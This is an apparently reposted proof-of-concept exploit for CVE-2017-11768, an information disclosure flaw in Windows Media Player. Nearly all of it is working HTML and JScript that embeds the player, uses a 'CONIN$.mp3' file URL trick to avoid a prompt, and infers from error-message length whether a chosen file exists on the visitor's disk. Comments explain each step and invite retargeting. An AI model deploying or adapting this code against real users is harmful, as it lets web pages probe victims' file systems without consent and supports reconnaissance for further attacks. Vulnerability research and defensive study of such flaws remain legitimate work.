Windows Media Player Information Disclosure

`https://www.facebook.com/ExploitWareLabs/posts/1647568611973673  
  
CVE-2017-11768 PoC code:  
  
<b>existing file:</b>  
  
<!-- "existing file:" with a bold tag to present a Windows Media Player mp3  
file is going to test for the presence of files on disk, in our case we are  
detecting cmd.exe binary in system32 folder. -->  
  
<br>  
<br>  
  
<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">  
  
<!-- Instantiating Specific class id - Windows Media Player HTMLView CLSID  
"6BF52A52-394A-11d3-B153-00C04F79FAA6" to embed Windows Media Player. -->  
  
<PARAM NAME="URL" VALUE="file://C://Windows//system32//cmd.exe//CONIN$.mp3">  
  
<!-- Testing for the presence of files on disk via param.url. I added  
"CONIN$.mp3" at the end of VALUE for valid detection, otherwise you'll get  
prompt that says "doesn't match the file format". CONIN$ is a console input  
device, the parameter of well known Windows function CreateFile. CONIN$ is  
reserved name on Windows which mean it's invalid mp3 file name thus  
bypasses prompt that checks extension. You can change param.url to your  
desired file/folder to detect. -->  
  
<param name="captioningID" value="displaylyric" />  
  
<PARAM NAME="autoStart" VALUE="-1">  
  
</OBJECT>  
  
<SCRIPT LANGUAGE = "JScript" FOR = Player EVENT = error()>  
  
if(Player.error.item(0).errorDescription.length==189){  
alert('File not detected.');  
}  
else{  
alert('File detected!');  
}  
</SCRIPT>  
`